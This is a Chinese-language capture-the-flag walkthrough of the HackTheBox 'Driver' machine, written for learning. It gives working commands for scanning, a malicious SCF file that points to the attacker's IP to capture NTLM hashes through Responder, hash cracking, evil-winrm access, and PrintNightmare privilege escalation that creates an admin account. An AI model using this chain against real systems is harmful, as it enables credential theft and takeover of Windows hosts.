Hackthebox:Driver 记录
字数 1221 2025-08-18 17:33:30

HackTheBox: Driver 靶机渗透教学文档

1. 靶机概述

  • 难度等级:HackTheBox官方认定的Easy难度
  • IP地址:10.10.11.106
  • 攻击机IP:10.10.16.5 (Kali Linux)
  • 主要攻击路径:SMB Share SCF文件攻击 → NTLM哈希捕获 → WinRM登录 → 打印机驱动漏洞提权

2. 初始信息收集

2.1 网络配置

确保攻击机与靶机网络连通:

ping 10.10.11.106

如果延迟高,可通过代理优化:

  • 在OpenVPN配置文件中添加:
socks-proxy 127.0.0.1 1088
或
http-proxy 127.0.0.1 8888

2.2 端口扫描

TCP端口扫描

sudo nmap --min-rate 10000 -p- 10.10.11.106

UDP端口扫描(可选):

sudo nmap -sU --min-rate 10000 -p- 10.10.11.106

详细服务扫描

sudo nmap -sT -sV -O -p80,135,445,5985 10.10.11.106

漏洞脚本扫描

sudo nmap --script=vuln -p80,135,445,5985 10.10.11.106

3. 服务枚举与初始访问

3.1 Web服务(80端口)

发现需要认证的Web界面,尝试弱口令:

  • 成功使用 admin:admin 登录

3.2 文件上传尝试

  1. 尝试上传Web Shell
  2. 上传显示成功但无法确定路径
  3. 尝试目录扫描未果
  4. 尝试SQL注入和命令执行均失败

4. SMB Share - SCF文件攻击

4.1 攻击原理

利用SCF文件强制目标系统向攻击者发送NTLM认证请求,从而捕获哈希值。

4.2 实施步骤

  1. 创建SCF文件(保存为attack.scf):
[Shell]
Command=2
IconFile=\\10.10.16.5\L7
[Taskbar]
Command=ToggleDesktop
  1. 启动Responder监听
sudo responder -I tun0

  1. 上传SCF文件到目标SMB共享

  2. 捕获NTLM哈希

  • 使用hashcat破解捕获的哈希:
hashcat -m 5600 hash.txt wordlist.txt
  • 成功破解出密码:liltony

5. WinRM登录

5.1 初始登录尝试

evil-winrm -i 10.10.11.106 -u tony -p liltony

5.2 常见问题解决

如果遇到SSL相关错误,可能需要修改OpenSSL配置:

  1. 编辑 /etc/ssl/openssl.cnf
  2. 添加或取消注释以下内容:
default_conf

openssl_conf = openssl_init
[openssl_init]
providers = provider_sect
[provider_sect]
default = default_sect
legacy = legacy_sect
[default_sect]
activate = 1
[legacy_sect]
activate = 1
  1. 如果Ruby版本问题导致evil-winrm无法工作:
# 查看可用Ruby版本
apt-cache search ruby | grep 3

# 安装新版本
sudo apt-get install ruby3.2

# 创建符号链接
sudo ln -sf /usr/bin/ruby3.2 /usr/bin/ruby
  1. 终极解决方案:使用干净的Kali环境

6. 权限提升

6.1 信息收集

  1. 下载并运行WinPEAS
wget https://github.com/carlospolop/peass-ng/releases/download/20221006/winpeasx64.exe
upload /path/to/winpeasx64.exe
  1. 检查PowerShell历史记录
  • 发现添加了RICOH PCL6打印机驱动程序的记录

6.2 利用打印机驱动漏洞(CVE-2021-1675)

  1. 下载漏洞利用脚本
git clone https://github.com/calebstewart/CVE-2021-1675
  1. 上传并执行
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # 默认添加adm1n/P@ssw0rd到本地管理员组

Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
  1. 使用新创建的管理员账户登录
evil-winrm -i 10.10.11.106 -u adm1n -p P@ssw0rd

7. 获取Flag

  • 用户Flag:user.txt
  • 系统Flag:root.txt

8. 总结与学习要点

  1. 关键攻击路径

    • SCF文件攻击获取NTLM哈希
    • WinRM远程管理
    • 打印机驱动漏洞提权

  2. 技术要点

    • SMB共享的安全风险
    • NTLM认证的脆弱性
    • Windows打印机驱动漏洞利用
    • 渗透测试中的环境问题解决

  3. 参考资源

    • CVE-2021-1675漏洞利用:https://github.com/calebstewart/CVE-2021-1675
    • WinPEAS:https://github.com/carlospolop/peass-ng
    • Evil-WinRM:https://github.com/Hackplayers/evil-winrm
HackTheBox: Driver 靶机渗透教学文档 1. 靶机概述 难度等级:HackTheBox官方认定的Easy难度 IP地址:10.10.11.106 攻击机IP:10.10.16.5 (Kali Linux) 主要攻击路径:SMB Share SCF文件攻击 → NTLM哈希捕获 → WinRM登录 → 打印机驱动漏洞提权 2. 初始信息收集 2.1 网络配置 确保攻击机与靶机网络连通: 如果延迟高,可通过代理优化: 在OpenVPN配置文件中添加: 2.2 端口扫描 TCP端口扫描 : UDP端口扫描 (可选): 详细服务扫描 : 漏洞脚本扫描 : 3. 服务枚举与初始访问 3.1 Web服务(80端口) 发现需要认证的Web界面,尝试弱口令: 成功使用 admin:admin 登录 3.2 文件上传尝试 尝试上传Web Shell 上传显示成功但无法确定路径 尝试目录扫描未果 尝试SQL注入和命令执行均失败 4. SMB Share - SCF文件攻击 4.1 攻击原理 利用SCF文件强制目标系统向攻击者发送NTLM认证请求,从而捕获哈希值。 4.2 实施步骤 创建SCF文件 (保存为attack.scf): 启动Responder监听 : 上传SCF文件 到目标SMB共享 捕获NTLM哈希 : 使用hashcat破解捕获的哈希: 成功破解出密码: liltony 5. WinRM登录 5.1 初始登录尝试 5.2 常见问题解决 如果遇到SSL相关错误,可能需要修改OpenSSL配置: 编辑 /etc/ssl/openssl.cnf 添加或取消注释以下内容: 如果Ruby版本问题导致evil-winrm无法工作: 终极解决方案:使用干净的Kali环境 6. 权限提升 6.1 信息收集 下载并运行WinPEAS : 检查PowerShell历史记录 : 发现添加了RICOH PCL6打印机驱动程序的记录 6.2 利用打印机驱动漏洞(CVE-2021-1675) 下载漏洞利用脚本 : 上传并执行 : 使用新创建的管理员账户登录 : 7. 获取Flag 用户Flag: user.txt 系统Flag: root.txt 8. 总结与学习要点 关键攻击路径 : SCF文件攻击获取NTLM哈希 WinRM远程管理 打印机驱动漏洞提权 技术要点 : SMB共享的安全风险 NTLM认证的脆弱性 Windows打印机驱动漏洞利用 渗透测试中的环境问题解决 参考资源 : CVE-2021-1675漏洞利用:https://github.com/calebstewart/CVE-2021-1675 WinPEAS:https://github.com/carlospolop/peass-ng Evil-WinRM:https://github.com/Hackplayers/evil-winrm